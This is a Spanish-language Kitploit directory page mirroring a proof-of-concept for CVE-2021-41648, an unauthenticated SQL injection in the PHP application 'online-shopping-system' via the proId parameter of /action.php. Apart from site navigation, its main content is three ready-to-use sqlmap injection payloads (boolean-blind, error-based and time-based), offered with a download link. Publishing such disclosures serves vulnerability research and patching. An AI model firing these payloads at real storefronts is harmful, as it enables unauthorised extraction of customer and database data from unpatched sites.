Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-41648 — Explotación de prueba de concepto para inyección SQL no autenticada en online-shopping-system a través del parámetro proId, permitiendo la extracción de datos de la base de datos MySQL. | Kitploit
Herramientas/GitHubGitHub/mobiusbinary/cve-2021-41648
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubmobiusbinary/cve-2021-41648

CVE-2021-41648

Explotación de prueba de concepto para inyección SQL no autenticada en online-shopping-system a través del parámetro proId, permitiendo la extracción de datos de la base de datos MySQL.

Ver Repositorio
hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-41648

CVE-2021-41648 Inyección SQL en online-shopping-system

El sistema online-shopping-system es vulnerable a ataques de inyección SQL no autenticados, ciegos basados en errores/booleanos y basados en errores.

El parámetro proId en la página /action.php no sanitiza la entrada del usuario, un atacante puede extraer datos sensibles de la base de datos MySQL subyacente.

Enlace a la aplicación

online-shopping-system

Componentes y parámetro afectados

URL: /action.php
PARÁMETRO: proId

Poc's

PAYLOADS DE SQLMAP

Parámetro proId en la página /action.php

Parameter: proId (POST) Type: ciego basado en booleanos Title: OR ciego basado en booleanos - cláusula WHERE o HAVING (NOT - comentario MySQL) Payload: proId=61 OR 17-7=10' OR NOT 4774=4774#&addToCart=1

Type: basado en errores Title: MySQL >= 5.0 OR basado en errores - cláusula WHERE, HAVING, ORDER BY o GROUP BY (FLOOR) Payload: proId=61 OR 17-7=10' OR (SELECT 6869 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6869=6869,1))),0x716a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gfTu&addToCart=1

Type: ciego basado en tiempo Title: MySQL >= 5.0.12 AND ciego basado en tiempo (consulta SLEEP) Payload: proId=61 OR 17-7=10' AND (SELECT 2990 FROM (SELECT(SLEEP(5)))YhWy)-- xWNo&addToCart=1

Si la imagen del PoC no es clara, haga clic en el GIF que se cargará con mejor resolución.

POC - parámetro proId

Descubierto por

Jason Colyvas
MOBIUSBINARY
21 de septiembre de 2021

Descargar herramienta